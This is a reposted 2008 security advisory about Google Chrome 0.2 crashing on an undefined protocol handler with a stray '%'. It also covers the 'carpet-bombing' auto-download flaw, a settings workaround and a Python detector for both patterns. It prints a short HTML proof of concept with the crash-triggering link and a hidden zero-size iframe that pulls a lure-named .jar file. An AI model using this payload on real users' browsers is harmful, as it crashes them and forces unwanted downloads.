
An undefined protocol handler crashes Google Chrome, ugh

September 3rd, 2008

"Whoa! Google Chrome has crashed. Restart now?"

Affected version:
Google Chrome Browser 0.2.149.27

Test environment:
Windows XP SP3
Windows 2003 SP1

Problem:

An issue exists in how Chrome behaves with undefined handlers in chrome.dll version 0.2.149.27. A crash can result without user interaction. When a user is made to visit a malicious link, which has an undefined handler followed by a 'special' character, Chrome crashes with a Google Chrome message window "Whoa! Google Chrome has crashed. Restart now?". It crashes on "int 3" at 0x01002FF3 as an exception/trap, followed by a "POP EBP" instruction when pointed to by the EIP register at 0x01002FF4.

Advisory URL: http://evilfingers.com/advisory/google_chrome_poc.php

Proof-of-concept code:

<html>
<head></head>
<body>
demo <a href="hello:%">HERE</a>

<iframe src="Free Coupwns!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.jar" frameborder=0 width=0 height=0></iframe>
</body>
</html>

On the "Google Chrome vulnerable to carpet-bombing flaw" issue, which Chrome inherits from its WebKit 525.13 (Safari 3.1) base (the hidden iframe in the proof-of-concept above demonstrates it): with default settings Google Chrome downloads the file automatically without any prompt. To avoid this, simply open the "Minor Tweaks" options page and tick "Ask where to save each file before downloading" (PS: that way you get a save-location prompt and know a file is about to be downloaded; otherwise Chrome quietly downloads it for you without your noticing).
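As an added example that is not part of the original post or of the advisory, the following static checker flags the two patterns shown in the proof-of-concept above, so a content filter or a triage script can spot them in fetched HTML: an anchor whose URL scheme is not one a browser is expected to handle and whose target contains a malformed percent sequence (the "special character" case), and a zero-size iframe pointing at a downloadable file (the carpet-bombing case). The scheme allowlist, the extension list and the heuristics are my own assumptions; the sample HTML is the post's proof-of-concept plus a constructed benign page.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Schemes a browser is expected to have a handler for (assumed allowlist).
KNOWN_SCHEMES = {"http", "https", "ftp", "mailto", "file", "javascript", "data", "about"}
# File types a hidden iframe has no legitimate reason to point at (assumed list).
DOWNLOAD_EXTENSIONS = (".jar", ".exe", ".msi", ".zip", ".scr")


def _has_malformed_percent(s: str) -> bool:
    """True if any '%' in s is not followed by two hex digits."""
    i = s.find("%")
    while i != -1:
        tail = s[i + 1:i + 3]
        if len(tail) < 2 or any(c not in "0123456789abcdefABCDEF" for c in tail):
            return True
        i = s.find("%", i + 1)
    return False


class SuspiciousMarkupFinder(HTMLParser):
    """Collects (kind, value) findings while walking the start tags of a page."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "a" and a.get("href"):
            href = a["href"]
            scheme = urlsplit(href).scheme.lower()
            # Unknown scheme plus a dangling '%' is exactly the PoC's trigger shape.
            if scheme and scheme not in KNOWN_SCHEMES and _has_malformed_percent(href):
                self.findings.append(("undefined-handler-link", href))
        elif tag == "iframe" and a.get("src"):
            src = a["src"]
            hidden = a.get("width") == "0" and a.get("height") == "0"
            path = urlsplit(src).path.lower()
            if hidden and path.endswith(DOWNLOAD_EXTENSIONS):
                self.findings.append(("hidden-iframe-download", src))


def scan(html: str):
    """Return the list of (kind, value) findings for one HTML document."""
    finder = SuspiciousMarkupFinder()
    finder.feed(html)
    finder.close()
    return finder.findings


# Sample input: the proof-of-concept from the post (not constructed).
POC_HTML = """<html>
<head></head>
<body>
demo <a href="hello:%">HERE</a>
<iframe src="Free Coupwns!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.jar" frameborder=0 width=0 height=0></iframe>
</body>
</html>"""

# Sample input: a constructed benign page that should produce no findings.
BENIGN_HTML = """<html><body>
<a href="https://example.com/path?q=100%25">ok</a>
<iframe src="https://example.com/embed" width=300 height=200></iframe>
</body></html>"""


if __name__ == "__main__":
    for kind, value in scan(POC_HTML):
        print(f"{kind}: {value!r}")
    print("benign findings:", scan(BENIGN_HTML))
```

The check deliberately requires both an unknown scheme and a malformed percent sequence before reporting a link, so ordinary custom-scheme links (which are common and harmless) are not flagged on their own; likewise only iframes that are both hidden and pointing at a download are reported.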

More of the prompt: "Whoa! Google Chrome has crashed. Restart now?"

When reposting this original article, please credit it as reposted from: Lin's Space|Only[http://clin003.com]

Permalink: http://clin003.com/exploits/google-chrome-crashes-with-all-tabs-with-an-undefined-handler-followed-by-a-special-character-1464/
